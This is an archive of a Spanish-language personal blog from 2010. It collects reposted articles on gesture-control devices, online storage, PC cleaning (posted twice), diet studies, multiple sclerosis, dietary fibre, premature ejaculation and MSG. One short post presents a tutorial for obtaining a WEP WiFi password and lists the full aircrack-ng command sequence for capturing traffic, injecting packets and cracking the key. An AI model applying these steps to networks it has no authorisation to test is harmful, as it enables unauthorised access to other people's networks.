Domingo, 31 de enero de 2010
Por Ashlee Vance
The New York Times

LAS VEGAS.- La industria de la tecnología se aleja de los controles remotos, del mouse y de los joystick, para acercarse a algo que llega sin baterías, sin cables o sin manual de instrucciones.

Su nombre es simple: mano.

En los próximos meses, Microsoft y los grandes fabricantes de computadoras comenzarán a vender dispositivos que permitirán a las personas cambiar canales de televisión o mover documentos en la pantalla de una computadora con simples gestos de la mano. La tecnología, que es uno de los cambios más significativos hacia los dispositivos de interfaz humana desde que aparecieron el mouse y las computadoras, a comienzos de la década de 1980, se mostró aquí la semana última en sesiones privadas durante la CES (Feria Internacional de Electrónica de Consumo).

Los anteriores intentos relacionados con una tecnología similar han resultado ser anticuados y desalentadores. En contraste, la cosecha más reciente de dispositivos que funcionan por medio de gestos llega con una sorpresa reconfortante: realmente funcionan.

"Todo finalmente está yendo en la dirección correcta", dijo GestureTek , una compañía que fabrica software para dispositivos que funcionan por medio de los gestos.

Con frecuencia, cuando se habla de control por gestos los fabricantes se remiten a las escenas de la película "Minority Report" (Sentencia previa, como se la denominó en su estreno en 2002), para explicar su funcionamiento. Allí, el personaje interpretado por Tom Cruise mueve imágenes y documentos en pantallas de computadoras del futuro con algunos movimientos de brazo. La tecnología de la vida real requerirá dispositivos que sean similarmente fáciles de utilizar y algo de ingenio.

Colóquese parado frente al televisor con una cámara que cuente con tecnología gestual y podrá encenderlo con un suave golpe en el aire. El cambio de canales requiere un giro de la mano y para elevar el volumen se debe dar una palmadita ascendente. Si en la pantalla hay una fotografía, se la puede ampliar sosteniendo las manos en el aire y separándolas y se la puede achicar juntando las manos como se haría con los dedos en un teléfono celular cuya pantalla cuenta con funciones sensibles al tacto.

La revolución gestual será más importante hacia fines de este año, cuando Microsoft lance un nuevo sistema de videojuego que se conoce como: Project Natal . El sistema de juegos es el intento de Microsoft por superar a la Wii, de Nintendo.

Mientras que la Wii requiere controles de mano hipersensibles para traducir movimientos corporales en acción en la pantalla, Natal, de Microsoft, necesitará nada más que el cuerpo humano. Microsoft ha hecho una demostración de juegos como el quemado, donde la gente puede saltar, lanzar pelotas a los oponentes y esquivarlas usando movimientos naturales. Otros juegos permiten que la gente se contorsione para adoptar diferentes posturas y que haga trucos en patineta.

Así como el sistema de juegos de Microsoft conmociona al mercado, lo mismo debería suceder con los televisores de Hitachi, en Japón, los cuales permitirán a la gente encender la pantalla, cambiar canales y aumentar o reducir el volumen de sus aparatos con simples movimientos de la mano.

Se espera que las futuras computadoras portátiles también cuenten con cámaras incorporadas que podrán captar gestos similares. Dicha tecnología podría hacer que las herramientas de la pantalla táctil de la actualidad pasen a ser obsoletas a medida que la gente use los gestos para controlar, por ejemplo, la función de adelantar o retroceder en un DVD.

Para que estas funciones cobren vida, los fabricantes de dispositivos debieron conquistar lo que se suma a uno de los grandes desafíos de la ciencia de la computación. La electrónica tenía que ver el mundo que la rodeaba en detalle a través de pequeñas cámaras digitales. Dicha tarea significó darle al televisor, por ejemplo, una manera de identificar a las personas sentadas en un sofá y de reconocer un determinado movimiento de la mano como una orden y no como si fuera la acción de rascarse la nariz.

Pequeñas cosas como el sol, las luces de las habitaciones y el molesto hábito de la gente de hacer un movimiento inesperado son sólo algunos de los obstáculos que las compañías tuvieron que superar.

GestureTek, que posee oficinas en Silicon Valley y en Ottawa, ha pasado un cuarto de siglo tratando de perfeccionar su tecnología y ha logrado cierto éxito. Brinda ayuda a los pronosticadores de televisión, y colabora con museos y hoteles para crear enormes pantallas interactivas.

Este trabajo del pasado, sin embargo, ha dependido de cámaras limitadas y estándar que perciben el mundo en dos dimensiones. El mayor suceso relacionado con la más reciente tecnología gestual llega a través del uso de cámaras que ven el mundo en tres dimensiones, sumando así ese crucial nivel de percepción que ayuda a una computadora o a un televisor a reconocer cuando alguien inclina la mano hacia delante o asiente con la cabeza.

PrimeSense , una firma nueva de Tel Aviv, han luchado por proveer los chips 3-D para el sistema de juegos Natal, de Microsoft.

En la CES, que se llevó a cabo la semana última, en Las Vegas, ejecutivos e ingenieros de Canesta y de GestureTek fueron recluidos en suites del hotel Hilton, cerca del piso donde tendría lugar la conferencia, mientras acompañaban a ejecutivos de las firmas asiáticas fabricantes de electrónica cuando entraban y salían de reuniones reservadas.

De manera similar, PrimeSense realizó sesiones a las cuales se podía asistir únicamente con invitación, en su pequeño puesto, cercado por paredes, y prohibió cualquier fotografía o video de sus productos.

En la demostración, una cámara que usaba el chip de PrimeSense pudo distinguir entre múltiples personas sentadas en un sofá e incluso pudo marcar la diferencia entre la campera, la camisa y la camiseta de una persona. Y, con esa tecnología, es imposible (por mucho que se intente) perder el control remoto.


Publicado por jacintoluque @ 15:18
Comentarios (0)  | Enviar

Posted: 30 Jan 2010 01:53 PM PST

Este muy bien hecho video tutorial (disponible en HD!)demuestra lo simple que es conseguir la contraseña de una red WiFi (que esté utilizando WEP), con el programa Backtrack.

 Los programas necesarios, los encontrarán aquí

http://www.backtrack-linux.org
http://www.imgburn.com

Necesitarán también un disco en blanco para poder correr el programa (es un ISO)

 

Mientras que los comandos utilizados, son estos:

Startx
/etc/init.d/networking start
airmon-ng
airmon-ng stop [wireless card name]
airmon-ng start [wireless card name]
airmon-ng
airodump-ng [wireless card name]
ctrl c
airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
aireplay-ng -1 0 a [bssid] [wireless card name]
aireplay-ng -3 b [bssid][wireless card name]
ctrl + c
dir
aircrack-ng [filename]

 

via lifehacker

Similar Posts:

Publicado por jacintoluque @ 7:09
Comentarios (0)  | Enviar
Viernes, 22 de enero de 2010

Posted: 21 Jan 2010 10:54 AM PST

image

Box.net acaba de actualizar su excelente servicio de almacenamiento online con una función que estoy seguro, será de mucha utilidad en los meses por venir, mientras seguimos con la inevitable migración hacia el cloud storage, o almacenamiento online, de nuestra información.

 Desde ahora, cada vez que subamos un archivo que contenga uno de los formatos del cuadro de la derecha (documentos de Office, incluyendo DOCX, XLSX, PPTX, de OpenOffice, imágenes (incluyendo PSDs y AIs) video en Flash, archivos de audio, de programación, podremos verlos en línea, sin necesidad de descargarlos o de instalar aplicaciones.

Tienen un archivo en PSD o AI, y no cuentan con la suite de Adobe para poder abrirlos? No hay problema! Simplemente lo suben a sus cuentas de Box.net, y podrán verlos inmediatamente, sin descargar o instalar algún programa adicional.

 

image

 

 

 

 

 

 

 

 

 

 

 

 

 

Un archivo de Powerpoint en Box.net:

image

Interesantes mejoras para este servicio. No se olviden que pueden sacar una cuenta gratuita de hasta 1 GB de almacenamiento / 25 MB por archivo, o actualizar a una cuenta Pro con 10 GBs y archivos de hasta 1 GB de tamaño.

 

Utilizar Box.net

vía el blog de box.net

Similar Posts:

Publicado por jacintoluque @ 8:41
Comentarios (0)  | Enviar
Martes, 19 de enero de 2010

Uno de los estudios clínicos más recientes sobre los reemplazos de comida (RC) fue dirigido por investigadores de la Universidad de California en Los Angeles (UCLA) y publicado en la revista Nutrition Journal . Tomó únicamente personas obesas y sin síndrome metabólico, 100 en total, que recibieron una dieta con dos RC diarios y un déficit programado de 500 kilocalorías diarias. Pero la mitad del grupo recibió, sin saberlo, un 30% de proteína, el doble de una dieta estándar. En tres meses, ambos grupos perdieron alrededor de 4 kilogramos de peso total, pero el grupo "alta proteína" se sacó de encima el triple de tejido graso y conservó la misma masa muscular magra que el primer día.

Y esto es lo ideal, porque perder músculo es clínicamente desastroso. Aun en reposo, el músculo estriado quema muchas más calorías que casi cualquier otro tejido. El panorama que propone es que en medio de una dieta un individuo no sólo conserve, sino que aumente su masa muscular mediante ejercicio anaeróbico (actividad breve e intensa y músculos forzados a trabajar con poco oxígeno).

El estudio californiano es relevante no sólo por sus conclusiones sino porque tuvo lugar no en un ambiente de internación ni en un spa, sino en un entorno hospitalario de atención ambulatoria: gente común que vive su vida real.

Un segundo estudio fue realizado por investigadores de la Universidad de Ulm, Alemania. Duró un año y se hizo con 110 obesos que, a diferencia de los de California, sí padecían síndrome metabólico. Al cumplirse el año de estudio, el 64,5% del grupo RC más alta proteína ya se había sacado de encima el síndrome metabólico, en comparación con un 41% de aquellos que habían consumido RC sin suplementos proteicos.

Un tercer estudio, con 75 pacientes, recientemente publicado en el International Journal of Clinical Practice por investigadores de la Universidad Nacional de Seúl, Corea del Sur, convalida los métodos y resultados obtenidos por los investigadores norteamericanos de la UCLA.


Publicado por jacintoluque @ 7:11
Comentarios (0)  | Enviar

Posted: 18 Jan 2010 10:22 AM PST

Han abierto recientemente sus PCs y se han encontrado con una escena como estas?

4202478748_1312ecb020

Nada bonito, verdad? Ok, quizás es una exageración, pero Hoy, veremos algunos simples tips para mantener nuestra PC limpia, o al menos, algunos tips para limpiarla regularmente para que no llegue a esos extremos.

 

Mantener el Case de la PC lejos del piso.

 Screen shot 2010-01-18 at 12.40.36 PM

Traten de mantener el case elevado, no en el piso. No necesariamente en el escritorio, por supuesto, pero con algo de elevación para que no esté directamente en el piso. Es en el piso donde encontrarán la mayor cantidad de polvo, así que, con ventiladores jalando constantemente aire dentro de nuestro case, no es buena idea ponerlo tan cerca hacia donde encontraremos más polvo. Esto pueden llevarlo incluso más allá, y colocar algún pequeño closet, o cualquier mueble con puerta, extender los cables, y mantener nuestra PC en un ambiente más cerrado.

 

Cubrir agujeros en nuestra PC no usados

No me refiero a los agujeros de ventilación, pero si recientemente instalaron o sacaron un dispositivo de nuestra PC (una tarjeta de video, de red, de sonido) y han dejado el agujero sin cubrir, asegúrense de cubrirlo con algo. Este agujero ayudará a que el polvo se acumule más rápidamente, así que mejor cubrirlo con lo que sea. Al ser un agujero que usualmente está cubierto, no afectará en el flujo de aire.

 

Ponerle filtros de aspiradora a nuestra PC

PCP289.make3.vacuum_cleaner_filter-420-90PCP289.make3.fittingfilter-420-90

Este es un tip que encontré en TechRadar y que no he tenido la oportunidad de probar aún (no encuentro los filtros). Pero según el artículo, si compramosun set de filtros para aspiradora, tomamos la medida para nuestras PCs, cortamos tiras de ese tamaño, y las colocamos, el aire que entra estará mucho más libre de polvo. Puede que el flujo de aire disminuya, pero será mejor que nuestros ventiladores estén lentos por la cantidad de polvo acumulado. Eso sí, asegúrense de poner los filtros en las partes donde los ventiladores “jalan” el aire, no por donde lo expulsan. Otra alternativa a los filtros? Quizás usar una media panty. Si intentan este método, asegúrense de monitorear las temperaturas de la PC, a ver si aumentan demasiado.

 

Y si… tenemos que limpiar la PC?

 

Es algo que inevitablemente tendremos que hacer. Asegúrense de poner un recordatorio de vez en cuando (utilizando, quizás, Google Calendar, que incluso puede enviarnos un SMS para recordarnos lo que tenemos que hacer), quizás cada 3-4 meses. Tienen mala memoria, o no recuerdan cuando limpiar? No es mala idea comprar uno de esos cases semi-transparentes. Así tendremos un permanente recordatorio del estado de nuestra PC:

Screen shot 2010-01-18 at 12.55.16 PM 

Limpiar nuestra PC es relativamente simple, en realidad. El problema, es animarse a ello.

Lo primero, será desconectar nuestra PC por completo, y colocarla encima de un papel periódico.

 

step5_300 Lo que tenemos que conseguir, definitivamente, es una lata de aire comprimido, como ven al lado izquierdo.

Una vez que tengamos una, simplemente abrimos la PC (mientras esté apagada, obviamente), y utilizamos la lata para limpiar, como prioridad, ventiladores y zonas a las que llegar con otro método sea complicado. Empiecen de arriba, hacia abajo, limpiando la PC desde la parte superior (donde usualmente tenemos el PSU, o la “fuente&rdquoGui?o, hacia abajo, tratando de sacarle el povo a complicados dispositivos como ventiladores, el heatsink del CPU.

Ahora, una aspiradora que puede ser revertida para expulsar aire puede parecer lo mismo, pero sólo si utilizan dicha aspiradora exclusivamente para la PC. Si también la utilizan para aspirar regularmente otras superficies, corren el riesgo de dejar algunas partículas de tierra que podrían dañar los dispositivos. Y asegúrense de utilizarla solo en el modo revertido, pues aspirar puede generar daños a nuestra PC. En resumen, mejor utilizar una lata de aire comprimido.

Por último, utilizando una brocha / pincel grande, trataremos de “barrer” todo el polvo que ha caido / se ha acumulado en la parte inferior. Además, pueden usar Q-Tips para seguir limpiando las secciones donde no hayan podido llegar.

Similar Posts:

Publicado por jacintoluque @ 7:06
Comentarios (0)  | Enviar
Convertir Pagina web a PDF con PDFmyURL

Posted: 18 Jan 2010 11:54 AM PST

Screen shot 2010-01-18 at 1.26.24 PM

Necesitan convertir una página web a un PDF? PDFmyURL lo realiza en segundos! Basta con dirigirnos a la web de PDFmyURL

Screen shot 2010-01-18 at 1.40.19 PM 

Escribir la dirección que quieren convertir, y en segundos, obtendrán un PDF. Funcionó bastante bien, incluso para página pesadas (como el frontpage de arturogoga.com, terminando en un PDF de 1.8 MBs).

Una interesante manera de quizás llevarnos el frontpage de algunos websites para leerlos offline en cualquier momento, no? Siempre y cuando, claro, esos frontpages muestren la información completa.

Además, PDFmyURL ofrece también un bookmarklet, que podemos arrastrar a nuestros favoritos, y así convertir cualquier página que estemos visitando, con tan solo un click:

 2010-01-18_13.49.07

 

Link

via technospot

Similar Posts:

Publicado por jacintoluque @ 7:04
Comentarios (0)  | Enviar

Posted: 18 Jan 2010 10:22 AM PST

Han abierto recientemente sus PCs y se han encontrado con una escena como estas?

4202478748_1312ecb020

Nada bonito, verdad? Ok, quizás es una exageración, pero Hoy, veremos algunos simples tips para mantener nuestra PC limpia, o al menos, algunos tips para limpiarla regularmente para que no llegue a esos extremos.

 

Mantener el Case de la PC lejos del piso.

 Screen shot 2010-01-18 at 12.40.36 PM

Traten de mantener el case elevado, no en el piso. No necesariamente en el escritorio, por supuesto, pero con algo de elevación para que no esté directamente en el piso. Es en el piso donde encontrarán la mayor cantidad de polvo, así que, con ventiladores jalando constantemente aire dentro de nuestro case, no es buena idea ponerlo tan cerca hacia donde encontraremos más polvo. Esto pueden llevarlo incluso más allá, y colocar algún pequeño closet, o cualquier mueble con puerta, extender los cables, y mantener nuestra PC en un ambiente más cerrado.

 

Cubrir agujeros en nuestra PC no usados

No me refiero a los agujeros de ventilación, pero si recientemente instalaron o sacaron un dispositivo de nuestra PC (una tarjeta de video, de red, de sonido) y han dejado el agujero sin cubrir, asegúrense de cubrirlo con algo. Este agujero ayudará a que el polvo se acumule más rápidamente, así que mejor cubrirlo con lo que sea. Al ser un agujero que usualmente está cubierto, no afectará en el flujo de aire.

 

Ponerle filtros de aspiradora a nuestra PC

PCP289.make3.vacuum_cleaner_filter-420-90PCP289.make3.fittingfilter-420-90

Este es un tip que encontré en TechRadar y que no he tenido la oportunidad de probar aún (no encuentro los filtros). Pero según el artículo, si compramosun set de filtros para aspiradora, tomamos la medida para nuestras PCs, cortamos tiras de ese tamaño, y las colocamos, el aire que entra estará mucho más libre de polvo. Puede que el flujo de aire disminuya, pero será mejor que nuestros ventiladores estén lentos por la cantidad de polvo acumulado. Eso sí, asegúrense de poner los filtros en las partes donde los ventiladores “jalan” el aire, no por donde lo expulsan. Otra alternativa a los filtros? Quizás usar una media panty. Si intentan este método, asegúrense de monitorear las temperaturas de la PC, a ver si aumentan demasiado.

 

Y si… tenemos que limpiar la PC?

 

Es algo que inevitablemente tendremos que hacer. Asegúrense de poner un recordatorio de vez en cuando (utilizando, quizás, Google Calendar, que incluso puede enviarnos un SMS para recordarnos lo que tenemos que hacer), quizás cada 3-4 meses. Tienen mala memoria, o no recuerdan cuando limpiar? No es mala idea comprar uno de esos cases semi-transparentes. Así tendremos un permanente recordatorio del estado de nuestra PC:

Screen shot 2010-01-18 at 12.55.16 PM 

Limpiar nuestra PC es relativamente simple, en realidad. El problema, es animarse a ello.

Lo primero, será desconectar nuestra PC por completo, y colocarla encima de un papel periódico.

 

step5_300 Lo que tenemos que conseguir, definitivamente, es una lata de aire comprimido, como ven al lado izquierdo.

Una vez que tengamos una, simplemente abrimos la PC (mientras esté apagada, obviamente), y utilizamos la lata para limpiar, como prioridad, ventiladores y zonas a las que llegar con otro método sea complicado. Empiecen de arriba, hacia abajo, limpiando la PC desde la parte superior (donde usualmente tenemos el PSU, o la “fuente&rdquoGui?o, hacia abajo, tratando de sacarle el povo a complicados dispositivos como ventiladores, el heatsink del CPU.

Ahora, una aspiradora que puede ser revertida para expulsar aire puede parecer lo mismo, pero sólo si utilizan dicha aspiradora exclusivamente para la PC. Si también la utilizan para aspirar regularmente otras superficies, corren el riesgo de dejar algunas partículas de tierra que podrían dañar los dispositivos. Y asegúrense de utilizarla solo en el modo revertido, pues aspirar puede generar daños a nuestra PC. En resumen, mejor utilizar una lata de aire comprimido.

Por último, utilizando una brocha / pincel grande, trataremos de “barrer” todo el polvo que ha caido / se ha acumulado en la parte inferior. Además, pueden usar Q-Tips para seguir limpiando las secciones donde no hayan podido llegar.

Similar Posts:

Publicado por jacintoluque @ 7:02
Comentarios (0)  | Enviar
Lunes, 18 de enero de 2010
Los nuevos agentes biológicos mejoran la clínica y mantienen a un 37% de los pacientes libres de enfermedad

La esclerosis múltiple es una enfermedad en la que el sistema inmune desencadena un ataque sistémico que daña la protección de las células nerviosas (vaina de mielina). Esta circunstancia ocasiona una reacción inflamatoria persistente y degenerativa en el sistema nervioso central. La prevalencia de esta patología en España oscila entre 70 y 80 casos por cada 100.000 habitantes (más de 30.000 afectados), dos de cada tres son mujeres.

  • Autor: Por JORDI MONTANER
  • Fecha de publicación: 17 de enero de 2010

- Imagen: Wikimedia -

La esclerosis múltiple es más frecuente en la tercera década de vida. Los pacientes sufren desde muy jóvenes los signos de esta enfermedad y deben tratarse durante toda la vida, que se puede acortar entre cinco y siete años. "De ahí la importancia de instaurar un tratamiento precoz para frenar desde el inicio el proceso inflamatorio del sistema nervioso central, la pérdida de mielina (substancia que recubre las neuronas) y evitar, en lo posible, la degeneración de los axones (prolongación filiforme de la neurona por la que transmite impulsos nerviosos)", explica Txomin Arbizu, de la unidad de esclerosis múltiple del Hospital de Bellvitge (Hospitalet de Llobregat, Barcelona).

Agentes biológicos

Hoy en día, para tratar la enfermedad los neurólogos recurren al interferón beta-1a intramuscular o al natalizumab, un anticuerpo monoclonal que antes había demostrado su eficacia en otra enfermedad autoinmune: la enfermedad de Crohn. Hasta ahora, los tratamientos de primera línea protegían entre un tercio y la mitad de los brotes, pero se estima que en la actualidad es posible disminuir hasta un 70%. En la LXI Reunión Anual de la Sociedad Española de Neurología (SEN), expertos nacionales han constatado que con nuevos agentes biológicos es posible una mejoría de diferentes parámetros clínicos de la esclerosis múltiple y mantener a un 37% de los pacientes libres de enfermedad.

No obstante, según Arbizu, todavía hay mucho camino por recorrer: "Lo fundamental es conocer la causa de la enfermedad". El especialista propugna avanzar en el conocimiento epigenético de la esclerosis múltiple y en la identificación de factores medioambientales involucrados en el origen o causa de su desarrollo, como los desequilibrios en el aporte de vitamina D, infección por virus de Epstein-Barr, herpesvirus o hábitos tóxicos como alcoholismo o tabaquismo. Esta identificación "mejoraría el partido que sacamos del actual arsenal terapéutico y ayudaría a los pacientes a tener una mejor calidad de vida".

Un paroxismo nervioso

Las fibras nerviosas que entran y salen del cerebro están envueltas por una membrana aislante que permite la conducción de los impulsos eléctricos a lo largo de toda la fibra y les confiere velocidad y precisión. Sin esta mielina, los nervios están desprotegidos y sus impulsos se transmiten de forma inadecuada. En circunstancias normales, la vaina de mielina es capaz de repararse y regenerarse por sí misma, pero en la esclerosis múltiple tiene lugar una desmielinización extensa y continuada que acaba por dañar los nervios de forma irreversible.

Los síntomas y signos neurológicos son tan variables, que tanto los pacientes como los médicos pueden pasar por alto el diagnóstico

En la enfermedad se forman, de manera progresiva, zonas desmielinizadas en los nervios del ojo o la médula espinal. Los síntomas y signos neurológicos son tan variables, que tanto los pacientes como los médicos pueden pasar por alto el diagnóstico. Si bien el curso de la enfermedad empeora con el tiempo, las personas afectadas pasan por periodos de salud más o menos buenos (remisiones), que se alternan con brotes incapacitantes (exacerbaciones).

En la esclerosis, se conoce más de los factores hereditarios que de los ambientales. Alrededor del 5% de las personas enfermas tiene un hermano con la misma afección y el 15% sabe de algún familiar más lejano que la padece. Los síntomas iniciales más frecuentes son: hormigueo, entumecimientos u otras sensaciones peculiares en extremidades, tronco o cara.

Algunas personas sólo desarrollan síntomas en los ojos y pueden experimentar trastornos como visión doble, ceguera parcial o dolor localizado en un ojo, visión nublada y pérdida de la visión central (neuritis óptica). Otros síntomas iniciales se manifiestan mediante ligeros cambios emocionales o mentales, que irrumpen meses o años antes de que se haya diagnosticado la esclerosis múltiple.

Es una enfermedad de curso variado e impredecible, que en ocasiones origina síntomas aislados y durante meses o años carece de otros síntomas. También puede ocurrir que estos empeoren y se generalicen al cabo de semanas o meses.

Variaciones climáticas

Se desconocen las causas, pero la esclerosis múltiple se manifiesta en 1 de cada 2.000 individuos que pasan la primera década de su vida en climas templados y sólo en 1 de cada 10.000 nacidos en climas tropicales. Entre los niños que viven sus primeros 10 años en países muy próximos al ecuador, la enfermedad casi nunca se registra. Lo lógico sería pensar que el calor protege, pero se conoce que los síntomas del paciente con esclerosis múltiple pueden acentuarse debido a un exceso de calor (por un clima muy cálido o por baños o duchas calientes), incluso por una fiebre.

Se han descrito recidivas espontáneas de la enfermedad tras una infección por gripe. Los síntomas agudos pueden controlarse con la administración de corticosteroides durante breves periodos.

La infección por el virus linfotrópico de células T humanas (HTLV), que se registra en países tropicales, causa también una desmielinización en la médula espinal (mielopatía asociada a infección). Como la esclerosis múltiple, empeora con los años y, de manera gradual, provoca espasticidad y debilidad en las piernas y deteriora las funciones de la vejiga urinaria y los intestinos.

Por una vida activa

Los expertos insisten en que las personas con esclerosis múltiple pueden llevar una vida activa pese a cansarse con facilidad y no poder cumplir con demasiadas obligaciones. Los ejercicios practicados con regularidad, como la equitación, bicicleta estática, paseos, natación y estiramientos reducen la espasticidad (hipertonía muscular que se manifiesta por espasmos) y contribuyen a mantener una salud cardiovascular, muscular y psicológica en buen estado.

La fisioterapia puede contribuir al mantenimiento del equilibrio y la capacidad de deambulación, al tiempo que reduce los espasmos musculares y la debilidad.

GRIPE A


- Imagen: Xenia Antunes/Morguefile -

En los pacientes con esclerosis múltiple, la gripe implica complicaciones si se padecen patologías de base asociada, la enfermedad se halla en estado muy avanzado o se administran determinados medicamentos. En estos enfermos, es conveniente una vacunación preventiva contra la gripe vulgar y, este año, contra la gripe A H1N1; esta medida es fundamental si los pacientes afrontan una inmunosupresión causada por el tratamiento y según la gravedad y/o permanencia de los síntomas. El neurólogo deberá sentar las bases para la vacunación, aunque ésta puede administrarse tanto en hospitales como en centros de atención primaria.


Publicado por jacintoluque @ 19:11
Comentarios (0)  | Enviar
Los últimos años ha aumentado el número de personas con sobrepeso debido a un alejamiento cada vez mayor de la población de los cánones propios de la Dieta Mediterránea, una de las más saludables. Para paliar esto, son cada vez mayores los esfuerzos para concienciar a la población de la necesidad de mejorar los hábitos alimenticios y de ingerir determinados componentes y alimentos que ayudan a ello.

Uno de estos componentes que debe estar más presente en los menús es la denominada fibra alimenticia o dietética. Se trata de un conjunto de sustancias que encontramos en los vegetales y que están constituidas por componentes no digeribles que el intestino no puede procesar. Existen principalmente dos tipos: la soluble (con efecto prebiótico) y la indisoluble (mayor efecto laxante). Las dos variedades se encuentran mezcladas en la mayoría de los alimentos.

Incluirla en la dieta

FrutasEste conjunto de sustancias que son la fibra, aportan multitud de beneficios para nuestro organismo, por lo que es fundamental en la dieta (se recomienda, en términos generales, consumir unos 25-30 gr/día). La ventaja principal que conocemos que aporta su ingesta, es la mejora considerable que produce en el tránsito intestinal. Con ella se consigue una mejor regularidad, siendo especialmente importante para las personas que padecen estreñimiento.

Pero no sólo aporta este beneficio a nuestra salud. Además, produce mayor sensación de saciedad, por lo que no puede faltar en dietas de adelgazamiento. Mejora también los niveles de azúcar en sangre, sobre todo la fibra soluble, ya que se hace más lenta la absorción de hidratos de carbono. Por si fuera poco, facilita que determinadas grasas se eliminen y ayuda a una mayor proliferación de las bacterias beneficiosas del intestino, mejorando, así, las defensas del organismo.

Búscala y tómala

La fibra como tal sólo se encuentra en alimentos de origen vegetal. La soluble predomina en las legumbres, frutas, verduras y algas; y la indisoluble en las legumbres, cereales integrales, verduras y hortalizas. Incluyendo en tu dieta tres piezas de fruta y dos de verdura al día, dos raciones de legumbres semanales, cereales (pan, arroz, pasta) y dos litros de agua (necesaria para que la fibra funcione), estarás tomando la necesaria.

CerealesSiempre puedes mejorar ese aporte. Cuida que la ingesta de fruta, por ejemplo, sea con cáscara. Consume en el desayuno, en la merienda o como tentempié, cereales integrales. Tienen más fibra porque el grano de trigo no está refinado, conserva la cubierta y el germen. El pan, la pasta y el arroz integral también tiene más que las variedades ‘normales’. Además, en los supermercados hay gran variedad de lácteos o galletas que llevan una cantidad añadida.

No sólo es importante que nos digan que tenemos que ingerir fibra diariamente, sino que con estas nociones dadas, sabemos el por qué de esa importancia y, lo mejor, cómo podemos aumentar su presencia en nuestra dieta tomando los alimentos adecuados.


Publicado por jacintoluque @ 19:06
Comentarios (0)  | Enviar
La rapidez de los varones en llegar al orgasmo durante lasrelaciones sexuales puede llegar a ser un serio problema para lapareja. Son muchos los factores que pueden estar implicados en estetrastorno: fisiológicos, psicológicos o biológicos.

El hombre está genéticamente concebido para una eyaculación rápida. Esto es debido a la necesidad de fecundary transmitir los genes de manera inmediata antes de la aparición de undepredador. En la actualidad, existen diversas terapias que ayudancontrolar las emociones y a mantener relaciones sexuales duraderas.

Posibles causas

Los psicólogos, médicos y urólogos proponen distintos orígenes de esteproblema. Como se comentó anteriormente, la eyaculación precoz fue unamanera de asegurar la supervivencia de la especie. Nuevas teorías loasocian a un deficiente desarrollo de la personalidad masculina, en laque podría estar presente el Síndrome de Peter Pan.

Desdeel punto de vista fisiológico, la eyaculación se puede deber a unproblema urológico, como la fimosis o la prostatitis. También puede serdebido a una mala lubricación durante la penetración.

Otralínea de investigación, sostiene que en las sociedades actuales, elacelerado ritmo de vida, el estrés y la búsqueda de placer inmediato,condicionan las relaciones sexuales de pareja, convirtiéndolas en unmero trámite para lograr una satisfacción instantánea.

Un tratamiento para cada caso

Tres de cada diez hombres padecen incapacidad para controlar laeyaculación. Cada paciente tiene unas características propias y porello existen diferentes tipos de terapias.

En aquellos individuos cuyo problema tenga un origen psicológico,existen fármacos antidepresivos que inhiben selectivamente laserotonina, provocando una extensión del tiempo antes de laeyaculación. Aunque el principal propósito de estos medicamentos estratar trastornos psiquiátricos, muchos terapeutas sexuales lo utilizanpara resolver la precocidad.

Por otro lado, existen técnicasque utilizan anestésicos locales, como la lidocaína, que insensibilizanla zona en donde se aplican. Hay que resaltar que este método tiene uninconveniente: disminuye el grado de placer que se puede alcanzar.

No obstante, expertos en sexualidad aconsejan seguir tratamientos basadosen técnicas y ejercicios, sin necesidad de utilizar fármacos. Algunasde ellas son:

- La masturbación, pero sin llegar al orgasmo.

- Controlar la respiración durante la penetración. Expiraciones completas mientras se mantienen relaciones.

- Penetraciones lentas, para que el pene se aclimate al calor de la vagina.

- Estimular los músculos de debajo del pene. Por ejemplo, durante la micción, intentar cortar el flujo de la orina.

La relación se resiente

Son muchas las mujeres que sienten frustración anteuna relación sexual en la cual no disfrutan. Por esta razón, muchasparejas pueden verse abocadas a la ruptura. En una sociedad en la quela fémina juega un papel decisivo, son ellas las que toman lainiciativa para resolver la situación.

Por otro lado, este trastorno también puede acarrear problemas en el entorno socialde quien lo padece. La irritabilidad, el mal humor, la ansiedad, elestrés, la inseguridad, o el miedo al sexo, pueden ser lasconsecuencias de una eyaculación anticipada.

Un problema todavía oculto

Aunque casi un tercio de la población masculina sufre este trastorno, son muchos los hombres que todavía no acuden a un especialista para tratarlo. El miedo, la vergüenza, o la ignorancia son los principales inconvenientes para poner fin al problema.

Lamejor manera de afrontarlo es tratarlo con la pareja, acudir alprofesional adecuado y recibir un tratamiento adecuado para cadaindividuo.

Publicado por jacintoluque @ 19:02
Comentarios (1)  | Enviar

El Glutamato y el Glutamato Monosódico: Analicemos los Mitos (Parte 1 de 2)

El Informe IFIC examina las investigaciones científicas que se realizaron sobre el glutamato y el glutamato monosódico y resume los hallazgos más recientes.
Debido a que la ciencia está en constante evolución, es muy extraño que los investigadores dejen de estudiar los diferentes alimentos
o sus ingredientes. Ese es el caso del glutamato monosódico. Aunque se ha estado usando ampliamente durante casi un siglo, continúa siendo objeto de estudio a la luz de los conocimientos científicos actuales y los méto-dos de prueba. Durante los últimos años, especialistas en los campos de la pediatría, alergias, farmacología, psicología médica, toxicología y ciencias alimenticias se han dedicado a revisar
los datos científicos sobre el glutamato.
En esta edición, el Informe IFIC examina las investigaciones científicas que se realizaron sobre el glutamato y el glutamato monosódico y resume los hallazgos más recientes.
¿Qué son el glutamato y el glutamato monosódico?
El glutamato es uno de los aminoácidos más comunes en la naturaleza. Es el principal componente de muchas proteínas y péptidos, y está presente en la mayoría de los tejidos. El cuerpo también produce glutamato y este elemento juega un papel esencial en el metabolismo humano. Prácticamente, todos los alimentos contienen glutamato. Es uno de los principales componentes en la mayoría de los alimentos
proteicos naturales como por ejemplo, la carne vacuna, el pescado, la leche y algunas verduras.
El glutamato monosódico es la sal de sodio del ácido glutámico, y es simplemente glutamato, agua y sodio. A principios del siglo XX los científicos aislaron al ingrediente (glutamato) en las plantas y llegaron a la conclusión de que se trataba del componente esencial que aportaba gusto y que servía para realzar el sabor. En las primeras décadas del siglo XX, se extrajo el glutamato monosódico de las algas marinas y de otras fuentes vegetales. En la actualidad, el glutamato monosódico se produce en muchos países del mundo por medio de un proceso de fermentación natural que usa la melaza de la caña de azúcar o de la remolacha azucarera, almidón y azúcar del maíz.
Propiedades que Realzan el Sabor
Cuando se presenta en su forma “libre” y no “unido” a otros aminoácidos de las proteínas, el glutamato realza el sabor de los alimentos.
Cuando se agrega glutamato monosódico a los alimentos, se está aportando una función saborizante similar a la que produce el glutamato libre. El glutamato monosódico se usa para realzar los sabores naturales de las carnes vacunas, carne de ave, mariscos, botanas, sopas y guisos.
